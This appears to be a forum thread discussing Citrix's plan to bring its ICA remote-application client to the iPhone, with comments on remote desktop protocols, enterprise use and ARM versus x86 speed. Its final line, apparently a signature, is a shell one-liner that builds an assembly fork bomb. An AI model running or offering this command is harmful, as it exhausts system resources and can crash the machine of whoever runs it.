Citrix To Bring Millions of Windows Apps To iPhone
Anonymous writes "Citrix is putting out word that it's developing an iPhone receiver that could make 'millions' of Windows applications work on Apple's handset. (Something Citrix is calling 'Project Braeburn.')
Aside from Flash and a few other apps, is anyone pining for Windows-based apps on the iPhone? (Exchange on the iPhone seems to be successful, but so does Apple's App store, which has done pretty well without Windows.)"
Citrix is near!
Performance: oh dear.
Sooner, the service
From suds of yesteryear.
Burma Shave
Get thee glass eyes, and, like a scurvy politician, seem to see things thou dost not.--King Lear
An answer to a question nobody was asking.
This is a sig. It is like every other sig in the world, except that it is mine, and it is different.
Citrix is thinking of releasing an ICA client for the iPhone. Wow. That is really "Bring[ing] millions of Windows apps to iPhone." Right. ICA is arguably superior(and certainly more common in business type scenarios); but VNC on iPhone is old news and does pretty much the same thing. Hell, it looks like an RDP client is also available.
I'm sure that a lot of people will find this quite useful(I know the iPhone-carrying; but otherwise MS-headed network manager at my workplace will be all over it); but this is neither surprising nor especially interesting, and far from groundbreaking. Citrix will(assuming they manage to beat x11 support out the door) be the third graphical remote protocol to make it to the iPhone. Useful for people in environments that use citrix; but hardly novel.
Working in IT, one of the problems I have with my blackberry is that the ability to RDP into my work enviroment is not possible on a free scale, therefore work is not persuing the opportunity. With citrix available on an iPhone, all of a sudden, my ability to work has increased exponentially. Now if it works properly, that's a whole other story... And I can just see our remote desktop support going "You're logging into work how now?". "You think we're going to support this?"
Just a little over a week ago my boss brought this up:
He was referring to an article that he forgot to link to and I got the URL from an IM. It seems some "journalist" had an article due and the iPhone is hot and top 10 lists are easy to write. The #6 slot was dedicated to the enterprise shortfall of the iPhone by not including native support for editing MS-Office documents.
My boss doesn't even have a PDA. However, the other executives with PDAs have bought into the marketing line that needing to edit office documents on your phone is a sign of importance. That strokes their ego a lot more than pointing out it's more a sign of the need for a collaboration platform that can operate without duplicating and shuttling large binaries.
If you disagree then it must be overrated, redundant or trolling.
You do know that Citrix is a Remote Desktop (Terminal Services) add-on that displays applications in their own window instead of an entire desktop? Applications run on the server, not on the iPhone. Unless the Citrix client itself is filled with holes, there is nothing that can infect the iPhone, just the Windows Server hosting Citrix and the application.
Said, "It's just like dice but it's got more sides And it tells me who lives and who dies"
An ARM would choke emulating an x86 anyway. In fact even if you recompiled the x86 binaries to run on Arm it would still suck because desktop class x86s like Core2 have a higher clock rate, are out of order, have big caches and fast SDRAM.
An iPhone apparently has a ARM1176JZF running at ~400Mhz. The fastest ARM a QCT Snapdragon ARM at 1Ghz will most likely be slower than the slowest netbook class x86, an Intel Atom at 1.6Ghz.
Of course ARM uses much less power, but for single thread integer performance ARM is in a completely different class from x86.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;